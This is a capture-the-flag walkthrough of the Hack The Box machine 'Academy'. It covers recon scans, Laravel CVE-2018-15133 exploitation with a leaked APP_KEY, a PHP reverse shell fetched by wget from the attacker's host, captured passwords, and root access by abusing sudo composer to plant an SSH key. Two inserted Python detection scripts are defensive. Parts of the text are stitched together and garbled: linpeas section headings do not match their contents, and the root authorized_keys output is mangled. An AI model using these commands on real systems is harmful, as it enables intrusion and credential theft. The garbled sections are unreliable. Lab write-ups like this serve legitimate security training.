Academy

Introduction:
Academy is a great machine with lots of rabbit holes and opportunities to learn. I spent a lot of time tinkering with this one and looked for a lot of hints for the priv-escalation.
Recon
NMAP scan
# Nmap 7.91 scan initiated Sun Jan 3 09:00:32 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /oscp/tools/AutoRecon/src/autorecon/results/academy.htb/scans/_full_tcp_nmap.txt -oX /oscp/tools/AutoRecon/src/autorecon/results/academy.htb/scans/xml/_full_tcp_nmap.xml academy.htb
Nmap scan report for academy.htb (10.10.10.215)
Host is up, received user-set (0.015s latency).
Scanned at 2021-01-03 09:00:32 EST for 90s
Not shown: 65532 closed ports
Reason: 65532 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAIMsz8qKL1UCyrPmpM5iTmoy3cOsk+4L7oFdcPjBXwAcUVvnti7nXHlNqMfgsapbGSIl7AWTOeXLZmw2J6JWvE=
| 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBP1E2rWeTShvyJKxC5Brv1Do3OwvWIzlZHWVw/bD0R
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
33060/tcp open socks5 syn-ack
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe:
| Invalid message"
| HY000
| Radmin:
| authentication.mechanisms
| MYSQL41
| SHA256_MEMORY
| doc.formats
| text
| client.interactive
| compression
| algorithm
| deflate_stream
| lz4_message
| zstd_stream
| node_type
| mysql
|_ client.pwd_expire_ok
| socks-auth-info:
| No authentication
| No authentication
|_ No authentication
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 3 09:02:02 2021 -- 1 IP address (1 host up) scanned in 90.90 seconds
Enumeration
Nikto Scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.215
+ Target Hostname: academy.htb
+ Target Port: 80
+ Start Time: 2021-01-03 09:00:41 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie PHPSESSID created without the httponly flag
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ /login.php: Admin login page/section found.
+ 7785 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2021-01-03 09:05:08 (GMT-5) (267 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
whatweb
WhatWeb report for http://academy.htb:80
Status : 200 OK
Title : Hack The Box Academy
IP : 10.10.10.215
Country : RESERVED, ZZ

Summary : HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], Apache[2.4.41]

Detected Plugins:
[ Apache ]
 The Apache HTTP Server Project is an effort to develop and
 maintain an open-source HTTP server for modern operating
 systems including UNIX and Windows NT. The goal of this
 project is to provide a secure, efficient and extensible
 server that provides HTTP services in sync with the current
 HTTP standards.

 Version : 2.4.41 (from HTTP Server Header)
 Google Dorks: (3)
 Website : http://httpd.apache.org/

[ HTTPServer ]
 HTTP server header string. This plugin also attempts to
 identify the operating system from the server header.

 OS : Ubuntu Linux
 String : Apache/2.4.41 (Ubuntu) (from server string)

HTTP Headers:
 HTTP/1.1 200 OK
 Date: Sun, 03 Jan 2021 14:08:55 GMT
 Server: Apache/2.4.41 (Ubuntu)
 Vary: Accept-Encoding
 Content-Encoding: gzip
 Content-Length: 716
 Connection: close
 Content-Type: text/html; charset=UTF-8
Exploitation
During web enumeration you will find admin-page.php on the root site, which gives away another subdomain: http://dev-staging-01.academy.htb. Add it to /etc/hosts so the name resolves to the target, then visit the domain.

The website seems to be running the Laravel framework, and a quick search reveals an RCE vulnerability, CVE-2018-15133: Laravel unserializes the X-XSRF-TOKEN value, so anyone who knows the application key (APP_KEY) can run code on the server.

I wanted to avoid using Metasploit, so I looked for alternatives and found a pwn-laravel.py script on github.com.
Prepare reverse shell
eneloop@kinetic:.../hackthebox/academy/data$ cp /usr/share/webshells/php/php-reverse-shell.php .
eneloop@kinetic:.../hackthebox/academy/data$ echo "enel00p" | base64
ZW5lbDAwcAo=
eneloop@kinetic:.../hackthebox/academy/data$ mv php-reverse-shell.php ZW5lbDAwcAo.php
eneloop@kinetic:.../hackthebox/academy/data$ vi ZW5lbDAwcAo.php
Start webserver
eneloop@kinetic:.../hackthebox/academy/data$ py3

(py3) eneloop@kinetic:.../hackthebox/academy/data$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.215 - - [03/Jan/2021 11:00:51] "GET /ZW5lbDAwcAo.php HTTP/1.1" 200 -
10.10.10.215 - - [03/Jan/2021 11:01:21] "GET /ZW5lbDAwcAo.php HTTP/1.1" 200 -
10.10.10.215 - - [03/Jan/2021 11:04:15] "GET /ZW5lbDAwcAo.php HTTP/1.1" 200 -
Run the exploit
(py3) eneloop@kinetic:.../hackthebox/academy/data$ ./pwn-laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c 'ls -l ../../academy/public'

total 96
drwxr-xr-x 2 root root 4096 Nov 5 12:23 Modules_files
-rw-r--r-- 1 root root 1600 Aug 11 00:55 admin-page.php
-rw-r--r-- 1 root root 3247 Aug 12 21:28 admin.php
-rw-r--r-- 1 root root 174 Aug 9 16:55 config.php
-rw-r--r-- 1 root root 55036 Nov 9 10:13 home.php
drwxr-xr-x 2 www-data www-data 4096 Sep 14 22:38 images
-rw-r--r-- 1 www-data www-data 2117 Sep 14 22:40 index.php
-rw-r--r-- 1 root root 3185 Aug 12 21:28 login.php
-rw-r--r-- 1 root root 4304 Nov 5 12:51 register.php
-rw-r--r-- 1 root root 685 Aug 10 22:49 success-page.php

(py3) eneloop@kinetic:.../hackthebox/academy/data$ ./pwn-laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c 'ls -l ../../academy/public'^C
(py3) eneloop@kinetic:.../hackthebox/academy/data$ ./pwn-laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c 'cd ../../academy/public && wget http://10.10.14.25:8000/ZW5lbDAwcAo.php'

(py3) eneloop@kinetic:.../hackthebox/academy/data$ ./pwn-laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c 'ls -l ../../academy/public'

total 104
drwxr-xr-x 2 root root 4096 Nov 5 12:23 Modules_files
-rw-r--r-- 1 www-data www-data 5493 Jan 3 15:59 ZW5lbDAwcAo.php
-rw-r--r-- 1 root root 1600 Aug 11 00:55 admin-page.php
-rw-r--r-- 1 root root 3247 Aug 12 21:28 admin.php
-rw-r--r-- 1 root root 174 Aug 9 16:55 config.php
-rw-r--r-- 1 root root 55036 Nov 9 10:13 home.php
drwxr-xr-x 2 www-data www-data 4096 Sep 14 22:38 images
-rw-r--r-- 1 www-data www-data 2117 Sep 14 22:40 index.php
-rw-r--r-- 1 root root 3185 Aug 12 21:28 login.php
-rw-r--r-- 1 root root 4304 Nov 5 12:51 register.php
-rw-r--r-- 1 root root 685 Aug 10 22:49 success-page.php

(py3) eneloop@kinetic:.../hackthebox/academy/data$
Start a local listener to catch the remote shell
(py3) eneloop@kinetic:.../tools/reverse-shell/python$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.215] 42648
Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 16:13:01 up 13:01, 0 users, load average: 0.00, 0.00, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python
Now we have a shell!
Post-exploit/PrivEsc
Download and run linpeas
$ wget http://10.10.14.25:8000/linpeas.sh
--2021-01-03 16:18:03-- http://10.10.14.25:8000/linpeas.sh
Connecting to 10.10.14.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 300193 (293K) [text/x-sh]
Saving to: 'linpeas.sh'

 0K .......... .......... .......... .......... .......... 17% 1.68M 0s
 50K .......... .......... .......... .......... .......... 34% 3.28M 0s
 100K .......... .......... .......... .......... .......... 51% 5.87M 0s
 150K .......... .......... .......... .......... .......... 68% 4.69M 0s
 200K .......... .......... .......... .......... .......... 85% 6.66M 0s
 250K .......... ...... .......... .......... ... 100% 6.66M=0.08s

2021-01-03 16:18:03 (3.75 MB/s) - 'linpeas.sh' saved [300193/300193]

$ ./linpeas.sh
/bin/sh: 6: ./linpeas.sh: Permission denied
$ chmod 755 linpeas.sh
$ ./linpeas.sh
 Starting linpeas. Caching Writable Folders...

[+] Files inside others home (limit 20)
/home/ch4p/.profile
/home/ch4p/.bashrc
/home/ch4p/.bash_logout
/home/egre55/.profile
/home/egre55/.bashrc
/home/egre55/.bash_logout
/home/egre55/.sudo_as_admin_successful
/home/g0blin/.profile
/home/g0blin/.bashrc
/home/g0blin/.bash_logout
/home/21y4d/.profile
/home/21y4d/.bashrc
/home/21y4d/.bash_logout
/home/cry0l1t3/.profile
/home/cry0l1t3/user.txt
/home/cry0l1t3/.bashrc
/home/cry0l1t3/.bash_logout
/home/mrb3n/.cache/composer/.htaccess
/home/mrb3n/.cache/motd.legal-displayed
/home/mrb3n/.profile

[+] Searching backup-manager files
backup-manager file: /var/www/html/academy/config/database.php
backup-manager file: /var/www/html/htb-academy-dev-01/config/database.php

[+] Searching uncommon passwd files (splunk)
backup-manager file: /etc/pam.d/passwd
backup-manager file: /usr/share/bash-completion/completions/passwd
backup-manager file: /usr/share/lintian/overrides/passwd

[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(egre55) gid=1000(egre55) groups=1000(egre55),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
uid=1003(21y4d) gid=1003(21y4d) groups=1003(21y4d)
uid=1004(ch4p) gid=1004(ch4p) groups=1004(ch4p)
uid=1005(g0blin) gid=1005(g0blin) groups=1005(g0blin)

[+] Searching passwords in config PHP files
/var/www/html/academy/config/database.php
/var/www/html/htb-academy-dev-01/config/database.php
Grep recursively for passwords
www-data@academy:grep -ir password /var/www/html | grep -vE '\$password|\$PASSWORD' | awk '{print $1}' | sort | uniq
www-data@academy:/var/www/html/academy$ cat .env
mySup3rP4s5w0rd!!
www-data@academy:/var/www/html/academy$ cat /etc/passwd | grep -vE 'nologin|false'
<academy$ cat /etc/passwd | grep -vE 'nologin|false'
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
egre55:x:1000:1000:egre55:/home/egre55:/bin/bash
mrb3n:x:1001:1001::/home/mrb3n:/bin/sh
cry0l1t3:x:1002:1002::/home/cry0l1t3:/bin/sh
21y4d:x:1003:1003::/home/21y4d:/bin/sh
ch4p:x:1004:1004::/home/ch4p:/bin/sh
g0blin:x:1005:1005::/home/g0blin:/bin/sh

[+] Checking for TTY (sudo/su) passwords in audit logs
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
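The type=TTY record above stores the keystrokes hex-encoded in its data= field, which is how a password typed into su ends up readable in audit.log. The following is an added example, not part of the original write-up: a small audit-log review script that decodes TTY records and flags the ones captured at a password prompt. Record 84 is taken from the page; records 83 and 85 and all function names are constructed for the example.

```python
import re
from datetime import datetime, timezone

# Record 84 is the raw line from the linpeas output on this page. Records 83
# and 85 are constructed for this example (83 mirrors the "su mrb3n" summary).
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1597199290.512:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=USER_AUTH msg=audit(1597199293.910:85): pid=2520 uid=1002 auid=0 ses=1 msg='op=PAM:authentication acct="mrb3n" res=success'
"""

TTY_RE = re.compile(
    r'type=TTY msg=audit\((?P<epoch>\d+)\.\d+:(?P<serial>\d+)\):'
    r'.*?\buid=(?P<uid>\d+)\b.*?\bcomm="(?P<comm>[^"]+)" '
    r'data=(?P<data>(?:[0-9A-Fa-f]{2})+)'
)

# Programs that read a password from the terminal: keystrokes recorded for
# them are credentials, not commands.
PASSWORD_PROMPTS = {"su", "sudo", "passwd", "login", "ssh"}
SHELLS = {"sh", "bash", "dash", "zsh"}


def decode_keystrokes(hex_data):
    """Decode the hex data= field back into the characters that were typed."""
    return bytes.fromhex(hex_data).decode("utf-8", errors="replace").rstrip("\r\n")


def parse_tty_records(log_text):
    """Return one dict per type=TTY record, in log order."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RE.search(line)
        if m is None:
            continue  # other record types carry no keystroke data
        when = datetime.fromtimestamp(int(m["epoch"]), tz=timezone.utc)
        records.append({
            "serial": int(m["serial"]),
            "time": when.strftime("%Y-%m-%d %H:%M:%S"),
            "uid": int(m["uid"]),
            "comm": m["comm"],
            "typed": decode_keystrokes(m["data"]),
        })
    return records


def exposed_credentials(records):
    """Flag keystrokes captured while a password prompt owned the terminal."""
    findings = []
    for prev, rec in zip([None] + records, records):
        if rec["comm"] not in PASSWORD_PROMPTS:
            continue
        secret = rec["typed"]
        findings.append({
            "serial": rec["serial"],
            "time": rec["time"],
            "uid": rec["uid"],
            "prompt": rec["comm"],
            # The shell record just before usually names the target account.
            "context": prev["typed"] if prev and prev["comm"] in SHELLS else "",
            # Report enough to locate the record without reprinting the secret.
            "masked": secret[:2] + "*" * max(len(secret) - 2, 0),
        })
    return findings


if __name__ == "__main__":
    for f in exposed_credentials(parse_tty_records(SAMPLE_AUDIT_LOG)):
        print(f"audit record {f['serial']} at {f['time']} UTC: uid {f['uid']} typed "
              f"{f['masked']} into {f['prompt']} (after: {f['context']!r})")
```

When a review like this turns up hits, rotate the exposed password, check whether pam_tty_audit is enabled with its log_passwd option, and review which accounts can read /var/log/audit.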
$ cat /tmp/tmp.nydKjmkOf4/composer.json
cat /tmp/tmp.nydKjmkOf4/composer.json
{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}
$ cd /tmp/tmp.nydKjmkOf4/
cd /tmp/tmp.nydKjmkOf4/
$ TF=/tmp/tmp.nydKjmkOf4
TF=/tmp/tmp.nydKjmkOf4
$ cat composer.json
cat composer.json
{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}
$
$ cat composer.json
cat composer.json
{"scripts":{"x":"date"}}
$ sudo composer --working-dir=$TF run-script x
sudo composer --working-dir=$TF run-script x
[sudo] password for mrb3n: mrb3n_Ac@d3my!

PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> date
Sun 03 Jan 2021 05:25:23 PM UTC

/tmp/tmp.nydKjmkOf4
$ ls
ls
composer.json
$
echo '{"scripts":{"x":'\"echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7E27YG63IorxGpi705pC4LC5qBNnLyhbtqc01Lq5R4Lp/DnWFYIFljgrRyZqnXsSG5eXkrfJHl8SvyyatPZTrUxFxXUsFz8TBDg+LTAfUMqbsYR4NBtfR5JjuZB8PvbWbFHRKhkrekLuhavcrhYfCk2ZDliagvBGYy/NSNwnpgzvC362RKP7Af3VpldkzHgg1+wN8vHLmfuGjkNd3Lq6xIV67nU5pWfT7oklNFV1TS9MQuX2YHVh/E6+hQH57v2fMCAbp+IXNEUi2UGEHtUmNiw5wSKY9SQtZ5ek1nx0W1VQp6gex/BpVzBxmQ1TZlM8CIOgaSTr+M+/XVrbmPCtt9CdmLSpA6R2ipVlP6Ou70bec6wj4dWWMW6HpwJjJFd2cnitS5frTMMDYKD+erkRupWPuDBurcO1LM7S67TgPjNpgXxWmaXhMRzllgouednTo+A0+T81J6WyT9USoEz6mmxftGBQLPyw6mXkWApvgHsfuCNLy2ZTPbEQiMHvmjBU= root@kinetic" \>\>/root/.ssh/authorized_keys\"'}}' > composer.json

echo '{"scripts":{"x":"cat /root/.ssh/authorized_keys"}}' > composer.json; sudo composer --working-dir=$TF run-script x;

$ cp composer.json composer.json.key
cp composer.json composer.json.key
$ ls
ls
composer.json composer.json.key
$ echo '{"scripts":{"x":"ls -l /root/.ssh/"}}' > composer.json; sudo composer --working-dir=$TF run-script x;
echo '{"scripts":{"x":"ls -l /root/.ssh/"}}' > composer.json; sudo composer --working-dir=$TF run-script x;
[sudo] password for mrb3n: mrb3n_Ac@d3my!

PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> ls -l /root/.ssh/
total 4
-rw------- 1 root root 1132 Jan 3 17:34 authorized_keys
$ echo '{"scripts":{"x":"cat /root/.ssh/authorized_keys"}}' > composer.json; sudo composer --working-dir=$TF run-script x;
echo '{"scripts":{"x":"cat /root/.ssh/authorized_keys"}}' > composer.json; sudo composer --working-dir=$TF run-script x;
[sudo] password for mrb3n: mrb3n_Ac@d3my!

PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3Nsfdsdfsdfgsdgsdfgsfdghhsfghdfghdfhhthfhfgh01Lq5R4Lp/DnWFYIFljgrRyZqnXsSG5eXkrfJHl8SvyyatPZTrUxFxXUsFz8TBDg+LTAfUMqbsYR4NBtfR5JjuZB8PvbWbFHRKhkrekLuhavcrhhgdfhghgfdhgdfhgfdhfghshshsh9MQuX2YHVh/E6+hQH57v2fMCAbp+IXNEUi2UGEHtUmNiw5wSKY9SQtZ5ek1nx0W1VQp6gex/BpVzBxmQ1TZlM8CIOgaSTr+M+/XVrbmPCtt9CdmLSpA6R2ipVlP6Ou70bec6wj4dWWMW6HpwJjJFd2cnitS5frTMMDYKD+erkRupWPuDBurcO1LMhttrhtfhfhhdhdhduCNLy2ZTPbEQiMHvmjBU= root@kinetic
ssh-rsa AAAAB3NzaC1ghfghfgdhgfdhgfdhgfhfghfghgfhhshhgshG5eXkrfJHl8SvyyatPZTrUxFxXUsFz8TBDg+LTAfUMqbsYR4NBtfR5JjuZB8PvbWbFHRKhkrekLuhavcrhYfCk2ZDliagvBGYy/NSNwnpgzvC362RKP7Af3VpldkzHgg1+wN8vHLmfuGjkNd3Lq6xIV67nU5pWfT7oklNFV1TS9MQuX2YHVh/E6+hQHfgshfghgfhfgh1VQp6gex/BpVzBxmQ1TZlM8CIOgaSTr+M+/XVrbmPCtt9CdmLSpA6RhghghgfhghgdfhfghgfhsghshfgdWmaXhMRzllgouednTo+A0+T81J6WyT9USoEz6mmxftGBQLPyw6mXkWApvgHsfuCNLy2ZTPbEQiMHvmjBU= root@kinetic
$
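The sudo composer run above works because Composer executes whatever the scripts section of composer.json contains, and --working-dir points it at a file the user controls. The following is an added example, not part of the original write-up: a detection sketch over sudo's auth.log entries that flags Composer running as root, with higher severity when it runs scripts from a user-writable directory. The log lines are constructed in sudo's standard format (only the first mirrors the transcript), and the function names and severity labels are assumptions.

```python
import re

# Constructed auth.log lines in sudo's standard log format. The first command
# mirrors the transcript above; timestamps, TTYs and the other two entries
# are made up for the example.
SAMPLE_AUTH_LOG = """\
Jan  3 17:25:20 academy sudo:    mrb3n : TTY=pts/1 ; PWD=/tmp/tmp.nydKjmkOf4 ; USER=root ; COMMAND=/usr/bin/composer --working-dir=/tmp/tmp.nydKjmkOf4 run-script x
Jan  3 17:40:02 academy sudo:   egre55 : TTY=pts/0 ; PWD=/var/www/html/academy ; USER=root ; COMMAND=/usr/bin/composer install --no-scripts
Jan  3 17:41:10 academy sudo:   egre55 : TTY=pts/0 ; PWD=/home/egre55 ; USER=root ; COMMAND=/usr/bin/apt update
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=\S+ ; PWD=(?P<pwd>.*?) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)
COMPOSER_NAMES = {"composer", "composer.phar"}
SCRIPT_COMMANDS = {"run-script", "run"}  # "run" is Composer's alias
USER_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def composer_invocation(cmd, pwd):
    """Return (workdir, subcommand) for a composer command line, else None."""
    argv = cmd.split()
    if not argv or argv[0].rsplit("/", 1)[-1] not in COMPOSER_NAMES:
        return None
    workdir, subcommand, args, i = pwd, None, argv[1:], 0
    while i < len(args):
        arg = args[i]
        if arg.startswith("--working-dir="):
            workdir = arg.split("=", 1)[1]
        elif arg in ("--working-dir", "-d") and i + 1 < len(args):
            i += 1
            workdir = args[i]
        elif not arg.startswith("-") and subcommand is None:
            subcommand = arg
        i += 1
    return workdir, subcommand


def flag_composer_sudo(log_text):
    """Return one finding per sudo entry that ran Composer as root."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if m is None or m["runas"] != "root":
            continue
        parsed = composer_invocation(m["cmd"], m["pwd"])
        if parsed is None:
            continue
        workdir, subcommand = parsed
        reasons = ["composer executed as root"]
        if subcommand in SCRIPT_COMMANDS:
            reasons.append("runs commands from the scripts section of composer.json")
        if (workdir.rstrip("/") + "/").startswith(USER_WRITABLE):
            reasons.append(f"composer.json is read from user-writable {workdir}")
        findings.append({
            "user": m["user"], "workdir": workdir, "subcommand": subcommand,
            "severity": "high" if len(reasons) == 3 else "review",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in flag_composer_sudo(SAMPLE_AUTH_LOG):
        print(f"[{f['severity']}] {f['user']}: " + "; ".join(f["reasons"]))
```

Detection only shortens the time to notice; the durable fix is to remove the sudo rule that lets mrb3n run composer as root, which Composer's own warning in the transcript already advises against.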
eneloop@kinetic:/oscp/tools$ cd ../keys
eneloop@kinetic:/oscp/keys$ ls
kali kali.pub
eneloop@kinetic:/oscp/keys$ ssh -i kali.pub [email protected]
Load key "kali.pub": invalid format
eneloop@kinetic:/oscp/keys$ ssh -i kali [email protected]
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

 System information as of Sun 03 Jan 2021 05:38:53 PM UTC

 System load: 0.0
 Usage of /: 44.8% of 15.68GB
 Memory usage: 25%
 Swap usage: 0%
 Processes: 199
 Users logged in: 0
 IPv4 address for ens160: 10.10.10.215
 IPv6 address for ens160: dead:beef::250:56ff:feb9:b490

0 updates can be installed immediately.
0 of these updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Nov 9 10:11:49 2020
root@academy:~# cat root.txt